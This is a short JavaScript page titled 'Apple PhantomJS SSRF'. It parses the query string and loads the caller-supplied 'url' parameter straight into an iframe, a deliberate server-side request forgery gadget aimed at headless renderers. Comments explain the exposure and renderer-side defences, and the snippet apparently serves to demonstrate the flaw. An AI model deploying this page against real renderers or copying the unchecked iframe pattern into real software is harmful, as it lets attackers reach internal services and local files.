Apple PhantomJS SSRF
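/**
 * Parse a URL query string into a plain key/value object.
 *
 * "+" is treated as an encoded space and every key and value is
 * percent-decoded. When a key repeats, the last occurrence wins.
 *
 * Everything returned here comes straight from the URL and is therefore
 * untrusted: callers must validate a value (scheme, host, length) before
 * using it as a URL, as markup, or in any other sensitive sink.
 *
 * @param {string} qs - Query string, with or without the leading "?".
 * @returns {Object<string, string>} Decoded parameters; empty when none parse.
 */
function getQueryParams(qs) {
  // Work on a local copy so the caller's argument is never reassigned, and
  // tolerate a missing argument instead of throwing on .split().
  var text = String(qs == null ? "" : qs).split("+").join(" ");
  var params = {};
  // Keys stop at "&" as well as "=", so a bare flag ("?debug&url=x") is
  // skipped instead of being glued onto the following key as "debug&url".
  var re = /[?&]?([^=&]+)=([^&]*)/g;
  var tokens;

  // decodeURIComponent throws URIError on a malformed escape such as "%E0%A";
  // fall back to the raw text so one bad parameter cannot abort the parse.
  function decodeOrRaw(part) {
    try {
      return decodeURIComponent(part);
    } catch (err) {
      return part;
    }
  }

  while ((tokens = re.exec(text)) !== null) {
    params[decodeOrRaw(tokens[1])] = decodeOrRaw(tokens[2]);
  }
  return params;
}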
// Pull the parameters out of this page's own query string. The values are
// entirely caller-controlled; nothing below checks scheme or host.
var query = getQueryParams(window.location.search);

// Element the frame is attached to. Assumes the hosting page defines an
// element with id "meta" (its markup is not visible here).
var iframeParent = document.getElementById("meta");

var iframe = document.createElement("iframe");
// NOTE(review): the "url" parameter is loaded into the frame verbatim. When a
// page like this is fetched by a server-side renderer (a headless browser, for
// example), the frame's request is issued from the renderer's network
// position, which is the SSRF exposure. The defence sits on the renderer side:
// restrict egress to public addresses, allow only http/https, and disable
// local-file access rather than trusting page content.
iframe.src = query.url;
iframeParent.appendChild(iframe);